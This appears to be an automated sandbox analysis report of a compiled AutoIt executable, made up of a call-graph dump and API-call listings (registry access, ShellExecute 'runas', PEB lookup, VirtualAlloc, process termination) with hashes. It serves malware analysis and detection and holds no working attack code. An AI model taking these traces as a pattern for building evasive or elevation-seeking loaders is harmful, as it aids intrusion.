103025->103072 103028 44ffdc 59 API calls 103029 44ff45 103028->103029 103030 437667 59 API calls 103029->103030 103031 44ff51 103030->103031 103032 437bcc 59 API calls 103031->103032 103033 43f796 103032->103033 103034 450162 6 API calls 103033->103034 103034->102997 103036 437667 59 API calls 103035->103036 103037 445f97 103036->103037 103038 437667 59 API calls 103037->103038 103039 445f9f 103038->103039 103079 445a9d 103039->103079 103042 445a9d 59 API calls 103043 445faf 103042->103043 103044 437667 59 API calls 103043->103044 103045 445fba 103044->103045 103046 450db6 Mailbox 59 API calls 103045->103046 103047 43f908 103046->103047 103048 4460f9 103047->103048 103049 446107 103048->103049 103050 437667 59 API calls 103049->103050 103051 446112 103050->103051 103052 437667 59 API calls 103051->103052 103053 44611d 103052->103053 103054 437667 59 API calls 103053->103054 103055 446128 103054->103055 103056 437667 59 API calls 103055->103056 103057 446133 103056->103057 103058 445a9d 59 API calls 103057->103058 103059 44613e 103058->103059 103060 450db6 Mailbox 59 API calls 103059->103060 103061 446145 RegisterWindowMessageW 103060->103061 103061->103011 103064 48576f 103063->103064 103065 44fdae 103063->103065 103082 499ae7 60 API calls 103064->103082 103067 450db6 Mailbox 59 API calls 103065->103067 103069 44fdb6 103067->103069 103068 48577a 103069->103015 103070->103022 103071->103024 103083 4971ed 65 API calls 103071->103083 103073 437667 59 API calls 103072->103073 103074 44ffe7 103073->103074 103075 437667 59 API calls 103074->103075 103076 44ffef 103075->103076 103077 437667 59 API calls 103076->103077 103078 44ff3b 103077->103078 103078->103028 103080 437667 59 API calls 103079->103080 103081 445aa5 103080->103081 103081->103042 103082->103068 103084 431016 103089 434974 103084->103089 103087 452d40 __cinit 67 API calls 103088 431025 103087->103088 103090 450db6 Mailbox 59 API calls 103089->103090 103091 43497c 103090->103091 103092 43101b 103091->103092 103096 434936 103091->103096 103092->103087 103097 434951 103096->103097 103098 43493f 103096->103098 103100 4349a0 103097->103100 103099 452d40 __cinit 67 API calls 103098->103099 103099->103097 103101 437667 59 API calls 103100->103101 103102 4349b8 GetVersionExW 103101->103102 103103 437bcc 59 API calls 103102->103103 103104 4349fb 103103->103104 103105 437d2c 59 API calls 103104->103105 103108 434a28 103104->103108 103106 434a1c 103105->103106 103107 437726 59 API calls 103106->103107 103107->103108 103109 434a93 GetCurrentProcess IsWow64Process 103108->103109 103111 46d864 103108->103111 103110 434aac 103109->103110 103112 434ac2 103110->103112 103113 434b2b GetSystemInfo 103110->103113 103124 434b37 103112->103124 103114 434af8 103113->103114 103114->103092 103117 434ad4 103119 434b37 2 API calls 103117->103119 103118 434b1f GetSystemInfo 103120 434ae9 103118->103120 103121 434adc GetNativeSystemInfo 103119->103121 103120->103114 103122 434aef FreeLibrary 103120->103122 103121->103120 103122->103114 103125 434ad0 103124->103125 103126 434b40 LoadLibraryA 103124->103126 103125->103117 103125->103118 103126->103125 103127 434b51 GetProcAddress 103126->103127 103127->103125 103128 431055 103133 432649 103128->103133 103131 452d40 __cinit 67 API calls 103132 431064 103131->103132 103134 437667 59 API calls 103133->103134 103135 4326b7 103134->103135 103140 433582 103135->103140 103138 432754 103139 43105a 103138->103139 103143 433416 59 API calls 2 library calls 103138->103143 103139->103131 103144 4335b0 103140->103144 103143->103138 103145 4335bd 103144->103145 103147 4335a1 103144->103147 103146 4335c4 RegOpenKeyExW 103145->103146 103145->103147 103146->103147 103148 4335de RegQueryValueExW 103146->103148 103147->103138 103149 433614 RegCloseKey 103148->103149 103150 4335ff 103148->103150 103149->103147 103150->103149 103151 47416f 103155 485fe6 103151->103155 103153 47417a 103154 485fe6 85 API calls 103153->103154 103154->103153 103156 486020 103155->103156 103161 485ff3 103155->103161 103156->103153 103157 486022 103167 439328 84 API calls Mailbox 103157->103167 103158 486027 103160 439837 84 API calls 103158->103160 103162 48602e 103160->103162 103161->103156 103161->103157 103161->103158 103164 48601a 103161->103164 103163 437b2e 59 API calls 103162->103163 103163->103156 103166 4395a0 59 API calls _wcsstr 103164->103166 103166->103156 103167->103158 103168 1f923b0 103182 1f90000 103168->103182 103170 1f92461 103185 1f922a0 103170->103185 103188 1f93490 GetPEB 103182->103188 103184 1f9068b 103184->103170 103186 1f922a9 Sleep 103185->103186 103187 1f922b7 103186->103187 103189 1f934ba 103188->103189 103189->103184 103190 43be19 103191 43be22 103190->103191 103204 43baab 103190->103204 103192 439837 84 API calls 103191->103192 103200 43ba8b Mailbox 103191->103200 103191->103204 103193 43be4d 103192->103193 103194 47107b 103193->103194 103195 43be5d 103193->103195 103205 487bdb 59 API calls _memmove 103194->103205 103196 437a51 59 API calls 103195->103196 103196->103200 103198 471085 103199 438047 59 API calls 103198->103199 103199->103200 103202 471361 103200->103202 103200->103204 103207 438cd4 59 API calls Mailbox 103200->103207 103202->103204 103206 453d46 59 API calls __wtof_l 103202->103206 103205->103198 103206->103204 103207->103200 103208 46fdfc 103226 43ab30 Mailbox _memmove 103208->103226 103210 48617e Mailbox 59 API calls 103223 43a057 103210->103223 103212 450db6 59 API calls Mailbox 103212->103226 103213 43b525 103308 499e4a 89 API calls 4 library calls 103213->103308 103216 450db6 59 API calls Mailbox 103219 439f37 Mailbox 103216->103219 103217 4709e5 103313 499e4a 89 API calls 4 library calls 103217->103313 103218 470055 103307 499e4a 89 API calls 4 library calls 103218->103307 103219->103216 103219->103218 103220 43b900 60 API calls 103219->103220 103221 43b475 103219->103221 103219->103223 103224 43b47a 103219->103224 103232 438047 59 API calls 103219->103232 103233 437667 59 API calls 103219->103233 103234 486e8f 59 API calls 103219->103234 103236 4709d6 103219->103236 103237 452d40 67 API calls __cinit 103219->103237 103239 43a55a 103219->103239 103301 43c8c0 331 API calls 2 library calls 103219->103301 103220->103219 103229 438047 59 API calls 103221->103229 103224->103217 103224->103218 103226->103212 103226->103213 103226->103219 103226->103223 103235 437de1 59 API calls 103226->103235 103240 4abc6b 331 API calls 103226->103240 103242 43b2b6 103226->103242 103244 439ea0 331 API calls 103226->103244 103245 47086a 103226->103245 103247 470878 103226->103247 103249 47085c 103226->103249 103250 43b21c 103226->103250 103253 486e8f 59 API calls 103226->103253 103255 4a445a 331 API calls 103226->103255 103257 4adf23 103226->103257 103260 4ac2e0 103226->103260 103292 497956 103226->103292 103298 48617e 103226->103298 103302 439c90 59 API calls Mailbox 103226->103302 103306 4ac193 85 API calls 2 library calls 103226->103306 103227 470064 103229->103223 103232->103219 103233->103219 103234->103219 103235->103226 103312 499e4a 89 API calls 4 library calls 103236->103312 103237->103219 103311 499e4a 89 API calls 4 library calls 103239->103311 103240->103226 103305 43f6a3 331 API calls 103242->103305 103244->103226 103309 439c90 59 API calls Mailbox 103245->103309 103310 499e4a 89 API calls 4 library calls 103247->103310 103249->103210 103249->103223 103303 439d3c 60 API calls Mailbox 103250->103303 103252 43b22d 103304 439d3c 60 API calls Mailbox 103252->103304 103253->103226 103255->103226 103314 4acadd 103257->103314 103259 4adf33 103259->103226 103261 437667 59 API calls 103260->103261 103262 4ac2f4 103261->103262 103263 437667 59 API calls 103262->103263 103264 4ac2fc 103263->103264 103265 437667 59 API calls 103264->103265 103266 4ac304 103265->103266 103267 439837 84 API calls 103266->103267 103291 4ac312 103267->103291 103268 437bcc 59 API calls 103268->103291 103269 4ac4fb 103270 4ac528 Mailbox 103269->103270 103406 439a3c 59 API calls Mailbox 103269->103406 103270->103226 103272 4ac4e2 103274 437cab 59 API calls 103272->103274 103273 4ac4fd 103278 437cab 59 API calls 103273->103278 103277 4ac4ef 103274->103277 103275 437924 59 API calls 103275->103291 103276 438047 59 API calls 103276->103291 103280 437b2e 59 API calls 103277->103280 103281 4ac50c 103278->103281 103279 437e4f 59 API calls 103284 4ac3a9 CharUpperBuffW 103279->103284 103280->103269 103282 437b2e 59 API calls 103281->103282 103282->103269 103283 437e4f 59 API calls 103285 4ac469 CharUpperBuffW 103283->103285 103404 43843a 68 API calls 103284->103404 103405 43c5a7 69 API calls 2 library calls 103285->103405 103288 439837 84 API calls 103288->103291 103289 437cab 59 API calls 103289->103291 103290 437b2e 59 API calls 103290->103291 103291->103268 103291->103269 103291->103270 103291->103272 103291->103273 103291->103275 103291->103276 103291->103279 103291->103283 103291->103288 103291->103289 103291->103290 103293 497962 103292->103293 103294 450db6 Mailbox 59 API calls 103293->103294 103295 497970 103294->103295 103296 49797e 103295->103296 103297 437667 59 API calls 103295->103297 103296->103226 103297->103296 103407 4860c0 103298->103407 103300 48618c 103300->103226 103301->103219 103302->103226 103303->103252 103304->103242 103305->103213 103306->103226 103307->103227 103308->103249 103309->103249 103310->103249 103311->103223 103312->103217 103313->103223 103315 439837 84 API calls 103314->103315 103316 4acb1a 103315->103316 103335 4acb61 Mailbox 103316->103335 103352 4ad7a5 103316->103352 103318 4acdb9 103319 4acf2e 103318->103319 103324 4acdc7 103318->103324 103391 4ad8c8 92 API calls Mailbox 103319->103391 103322 4acf3d 103322->103324 103325 4acf49 103322->103325 103323 439837 84 API calls 103340 4acbb2 Mailbox 103323->103340 103365 4ac96e 103324->103365 103325->103335 103330 4ace00 103380 450c08 103330->103380 103333 4ace1a 103386 499e4a 89 API calls 4 library calls 103333->103386 103334 4ace33 103337 4392ce 59 API calls 103334->103337 103335->103259 103339 4ace3f 103337->103339 103338 4ace25 GetCurrentProcess TerminateProcess 103338->103334 103341 439050 59 API calls 103339->103341 103340->103318 103340->103323 103340->103335 103384 4afbce 59 API calls 2 library calls 103340->103384 103385 4acfdf 61 API calls 2 library calls 103340->103385 103342 4ace55 103341->103342 103351 4ace7c 103342->103351 103387 438d40 59 API calls Mailbox 103342->103387 103343 4acfa4 103343->103335 103348 4acfb8 FreeLibrary 103343->103348 103345 4ace6b 103388 4ad649 107 API calls _free 103345->103388 103348->103335 103351->103343 103389 438d40 59 API calls Mailbox 103351->103389 103390 439d3c 60 API calls Mailbox 103351->103390 103392 4ad649 107 API calls _free 103351->103392 103353 437e4f 59 API calls 103352->103353 103354 4ad7c0 CharLowerBuffW 103353->103354 103393 48f167 103354->103393 103358 437667 59 API calls 103359 4ad7f9 103358->103359 103360 43784b 59 API calls 103359->103360 103361 4ad810 103360->103361 103363 437d2c 59 API calls 103361->103363 103362 4ad858 Mailbox 103362->103340 103364 4ad81c Mailbox 103363->103364 103364->103362 103400 4acfdf 61 API calls 2 library calls 103364->103400 103366 4ac989 103365->103366 103367 4ac9de 103365->103367 103368 450db6 Mailbox 59 API calls 103366->103368 103371 4ada50 103367->103371 103370 4ac9ab 103368->103370 103369 450db6 Mailbox 59 API calls 103369->103370 103370->103367 103370->103369 103372 4adc79 Mailbox 103371->103372 103373 4ada73 _strcat _wcscpy __wsetenvp 103371->103373 103372->103330 103373->103372 103374 439be6 59 API calls 103373->103374 103375 439b3c 59 API calls 103373->103375 103376 439b98 59 API calls 103373->103376 103377 439837 84 API calls 103373->103377 103378 45571c 58 API calls __crtCompareStringA_stat 103373->103378 103403 495887 61 API calls 2 library calls 103373->103403 103374->103373 103375->103373 103376->103373 103377->103373 103378->103373 103382 450c1d 103380->103382 103381 450cb5 VirtualAlloc 103383 450c83 103381->103383 103382->103381 103382->103383 103383->103333 103383->103334 103384->103340 103385->103340 103386->103338 103387->103345 103388->103351 103389->103351 103390->103351 103391->103322 103392->103351 103394 48f192 __wsetenvp 103393->103394 103395 48f1d1 103394->103395 103397 48f1c7 103394->103397 103399 48f278 103394->103399 103395->103358 103395->103364 103397->103395 103401 4378c4 61 API calls 103397->103401 103399->103395 103402 4378c4 61 API calls 103399->103402 103400->103362 103401->103397 103402->103399 103403->103373 103404->103291 103405->103291 103406->103270 103408 4860e8 103407->103408 103409 4860cb 103407->103409 103408->103300 103409->103408 103411 4860ab 59 API calls Mailbox 103409->103411 103411->103409 103412 43107d 103417 43708b 103412->103417 103414 43108c 103415 452d40 __cinit 67 API calls 103414->103415 103416 431096 103415->103416 103418 43709b __write_nolock 103417->103418 103419 437667 59 API calls 103418->103419 103420 437151 103419->103420 103421 434706 61 API calls 103420->103421 103422 43715a 103421->103422 103448 45050b 103422->103448 103425 437cab 59 API calls 103426 437173 103425->103426 103427 433f74 59 API calls 103426->103427 103428 437182 103427->103428 103429 437667 59 API calls 103428->103429 103430 43718b 103429->103430 103431 437d8c 59 API calls 103430->103431 103432 437194 RegOpenKeyExW 103431->103432 103433 46e8b1 RegQueryValueExW 103432->103433 103438 4371b6 Mailbox 103432->103438 103434 46e943 RegCloseKey 103433->103434 103435 46e8ce 103433->103435 103434->103438 103446 46e955 _wcscat Mailbox __wsetenvp 103434->103446 103436 450db6 Mailbox 59 API calls 103435->103436 103437 46e8e7 103436->103437 103439 43522e 59 API calls 103437->103439 103438->103414 103440 46e8f2 RegQueryValueExW 103439->103440 103441 46e90f 103440->103441 103443 46e929 103440->103443 103442 437bcc 59 API calls 103441->103442 103442->103443 103443->103434 103444 437de1 59 API calls 103444->103446 103445 433f74 59 API calls 103445->103446 103446->103438 103446->103444 103446->103445 103447 4379f2 59 API calls 103446->103447 103447->103446 103449 461940 __write_nolock 103448->103449 103450 450518 GetFullPathNameW 103449->103450 103451 45053a 103450->103451 103452 437bcc 59 API calls 103451->103452 103453 437165 103452->103453 103453->103425

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00433B68
                                                              • IsDebuggerPresent.KERNEL32 ref: 00433B7A
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,004F52F8,004F52E0,?,?), ref: 00433BEB
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                                • Part of subcall function 0044092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00433C14,004F52F8,?,?,?), ref: 0044096E
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00433C6F
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004E7770,00000010), ref: 0046D281
                                                              • SetCurrentDirectoryW.KERNEL32(?,004F52F8,?,?,?), ref: 0046D2B9
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004E4260,004F52F8,?,?,?), ref: 0046D33F
                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0046D346
                                                                • Part of subcall function 00433A46: GetSysColorBrush.USER32(0000000F), ref: 00433A50
                                                                • Part of subcall function 00433A46: LoadCursorW.USER32(00000000,00007F00), ref: 00433A5F
                                                                • Part of subcall function 00433A46: LoadIconW.USER32(00000063), ref: 00433A76
                                                                • Part of subcall function 00433A46: LoadIconW.USER32(000000A4), ref: 00433A88
                                                                • Part of subcall function 00433A46: LoadIconW.USER32(000000A2), ref: 00433A9A
                                                                • Part of subcall function 00433A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00433AC0
                                                                • Part of subcall function 00433A46: RegisterClassExW.USER32(?), ref: 00433B16
                                                                • Part of subcall function 004339D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00433A03
                                                                • Part of subcall function 004339D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00433A24
                                                                • Part of subcall function 004339D5: ShowWindow.USER32(00000000,?,?), ref: 00433A38
                                                                • Part of subcall function 004339D5: ShowWindow.USER32(00000000,?,?), ref: 00433A41
                                                                • Part of subcall function 0043434A: _memset.LIBCMT ref: 00434370
                                                                • Part of subcall function 0043434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00434415
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                              • String ID: This is a third-party compiled AutoIt script.$runas$%L
                                                              • API String ID: 529118366-3609972046
                                                              • Opcode ID: dccdfbc5d9e5e567a615d2ec14087e3ec0ffbc0bd5dca889c181f58e0542cdce
                                                              • Instruction ID: 5d57f81c1e0482f716e4892394bc2ceac60426254a4214a4856b9edb30477701
                                                              • Opcode Fuzzy Hash: dccdfbc5d9e5e567a615d2ec14087e3ec0ffbc0bd5dca889c181f58e0542cdce
                                                              • Instruction Fuzzy Hash: 88511671E04108AADB10EFB5DC05AFE7B74AF08715F0061BBF651A22A1DA785605CB2D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1037 4349a0-434a00 call 437667 GetVersionExW call 437bcc 1042 434a06 1037->1042 1043 434b0b-434b0d 1037->1043 1045 434a09-434a0e 1042->1045 1044 46d767-46d773 1043->1044 1046 46d774-46d778 1044->1046 1047 434b12-434b13 1045->1047 1048 434a14 1045->1048 1050 46d77a 1046->1050 1051 46d77b-46d787 1046->1051 1049 434a15-434a4c call 437d2c call 437726 1047->1049 1048->1049 1059 434a52-434a53 1049->1059 1060 46d864-46d867 1049->1060 1050->1051 1051->1046 1053 46d789-46d78e 1051->1053 1053->1045 1055 46d794-46d79b 1053->1055 1055->1044 1057 46d79d 1055->1057 1061 46d7a2-46d7a5 1057->1061 1059->1061 1062 434a59-434a64 1059->1062 1063 46d880-46d884 1060->1063 1064 46d869 1060->1064 1065 434a93-434aaa GetCurrentProcess IsWow64Process 1061->1065 1066 46d7ab-46d7c9 1061->1066 1067 434a6a-434a6c 1062->1067 1068 46d7ea-46d7f0 1062->1068 1071 46d886-46d88f 1063->1071 1072 46d86f-46d878 1063->1072 1069 46d86c 1064->1069 1073 434aaf-434ac0 1065->1073 1074 434aac 1065->1074 1066->1065 1070 46d7cf-46d7d5 1066->1070 1075 434a72-434a75 1067->1075 1076 46d805-46d811 1067->1076 1079 46d7f2-46d7f5 1068->1079 1080 46d7fa-46d800 1068->1080 1069->1072 1077 46d7d7-46d7da 1070->1077 1078 46d7df-46d7e5 1070->1078 1071->1069 1081 46d891-46d894 1071->1081 1072->1063 1082 434ac2-434ad2 call 434b37 1073->1082 1083 434b2b-434b35 GetSystemInfo 1073->1083 1074->1073 1084 46d831-46d834 1075->1084 1085 434a7b-434a8a 1075->1085 1087 46d813-46d816 1076->1087 1088 46d81b-46d821 1076->1088 1077->1065 1078->1065 1079->1065 1080->1065 1081->1072 1094 434ad4-434ae1 call 434b37 1082->1094 1095 434b1f-434b29 GetSystemInfo 1082->1095 1086 434af8-434b08 1083->1086 1084->1065 1090 46d83a-46d84f 1084->1090 1091 46d826-46d82c 1085->1091 1092 434a90 1085->1092 1087->1065 1088->1065 1096 46d851-46d854 1090->1096 1097 46d859-46d85f 1090->1097 1091->1065 1092->1065 1102 434ae3-434ae7 GetNativeSystemInfo 1094->1102 1103 434b18-434b1d 1094->1103 1099 434ae9-434aed 1095->1099 1096->1065 1097->1065 1099->1086 1101 434aef-434af2 FreeLibrary 1099->1101 1101->1086 1102->1099 1103->1102
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 004349CD
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • GetCurrentProcess.KERNEL32(?,004BFAEC,00000000,00000000,?), ref: 00434A9A
                                                              • IsWow64Process.KERNEL32(00000000), ref: 00434AA1
                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00434AE7
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00434AF2
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00434B23
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00434B2F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                              • String ID:
                                                              • API String ID: 1986165174-0
                                                              • Opcode ID: 5c9a4357339921b4f17e902603f7ccf7e627c574920bb4151bd5ef683f0001e2
                                                              • Instruction ID: 44c7c845859ebce400d2f4e4cdedf7bd5d9c1ab85570b55a0a8f6daf16cab874
                                                              • Opcode Fuzzy Hash: 5c9a4357339921b4f17e902603f7ccf7e627c574920bb4151bd5ef683f0001e2
                                                              • Instruction Fuzzy Hash: 8B91A2319897C4DAC731DBA884501ABFFE5AF6D300F44596FD0CA93B41D228B948C76E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1104 434e89-434ea1 CreateStreamOnHGlobal 1105 434ea3-434eba FindResourceExW 1104->1105 1106 434ec1-434ec6 1104->1106 1107 434ec0 1105->1107 1108 46d933-46d942 LoadResource 1105->1108 1107->1106 1108->1107 1109 46d948-46d956 SizeofResource 1108->1109 1109->1107 1110 46d95c-46d967 LockResource 1109->1110 1110->1107 1111 46d96d-46d98b 1110->1111 1111->1107
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00434D8E,?,?,00000000,00000000), ref: 00434E99
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00434D8E,?,?,00000000,00000000), ref: 00434EB0
                                                              • LoadResource.KERNEL32(?,00000000,?,?,00434D8E,?,?,00000000,00000000,?,?,?,?,?,?,00434E2F), ref: 0046D937
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00434D8E,?,?,00000000,00000000,?,?,?,?,?,?,00434E2F), ref: 0046D94C
                                                              • LockResource.KERNEL32(00434D8E,?,?,00434D8E,?,?,00000000,00000000,?,?,?,?,?,?,00434E2F,00000000), ref: 0046D95F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: 595d754d8783406d79fdcf7a50e3cf413845b8c6b575e8937f3d0be937ecb9b9
                                                              • Instruction ID: e5beebecaab1b45ec31f6b02a7f61cdfdc66dedf0f784a1ec72759cb478a5677
                                                              • Opcode Fuzzy Hash: 595d754d8783406d79fdcf7a50e3cf413845b8c6b575e8937f3d0be937ecb9b9
                                                              • Instruction Fuzzy Hash: 7C115E75240700BFD7258B65EC49F677BBAFBC9B12F204279F409D6250DB61EC048665
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: pbO$%L
                                                              • API String ID: 3964851224-529566928
                                                              • Opcode ID: f10f8e41d52a6c10c91f82d42a3d6359e67b1eef7bbe4126e6891630d11b5439
                                                              • Instruction ID: eddd68665aca6b03fe9dc150d960ae3151f5c9fa24aca202cec267b285923c74
                                                              • Opcode Fuzzy Hash: f10f8e41d52a6c10c91f82d42a3d6359e67b1eef7bbe4126e6891630d11b5439
                                                              • Instruction Fuzzy Hash: 00929D746083418FD720DF24C480B6BB7E1BF89304F15896EE98A8B352D779EC55CB9A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DdO$DdO$DdO$DdO$Variable must be of type 'Object'.
                                                              • API String ID: 0-3753932206
                                                              • Opcode ID: bf604d8f60eb41c4a81cc4d3cdf371b0a50bb4000ebf8e90b21437e72fb98c49
                                                              • Instruction ID: ecd94180f3dd0fa48069be316de8db93c9861611fc32c459ec4af120ce1e95e6
                                                              • Opcode Fuzzy Hash: bf604d8f60eb41c4a81cc4d3cdf371b0a50bb4000ebf8e90b21437e72fb98c49
                                                              • Instruction Fuzzy Hash: 21A2AF74A01205CFCB24DF5AC480AAEB7B1FF58314F25906BE905AB391D739ED42CB99
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,0046E398), ref: 0049446A
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 0049447B
                                                              • FindClose.KERNEL32(00000000), ref: 0049448B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: 6191dbfa0692489dc8655b93bac99d5aa7e6cb6b4eb00174c0bf0de80a71e23e
                                                              • Instruction ID: 4495b08c62dc998e64bab6951bd6f27a4c62454f7ff470b5dbf300275a26c849
                                                              • Opcode Fuzzy Hash: 6191dbfa0692489dc8655b93bac99d5aa7e6cb6b4eb00174c0bf0de80a71e23e
                                                              • Instruction Fuzzy Hash: 4AE0D832410500674614AB78EC0D8EA7B9C9E45335F100776FC39C11D0E7785905959E
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00440A5B
                                                              • timeGetTime.WINMM ref: 00440D16
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00440E53
                                                              • Sleep.KERNEL32(0000000A), ref: 00440E61
                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00440EFA
                                                              • DestroyWindow.USER32 ref: 00440F06
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00440F20
                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00474E83
                                                              • TranslateMessage.USER32(?), ref: 00475C60
                                                              • DispatchMessageW.USER32(?), ref: 00475C6E
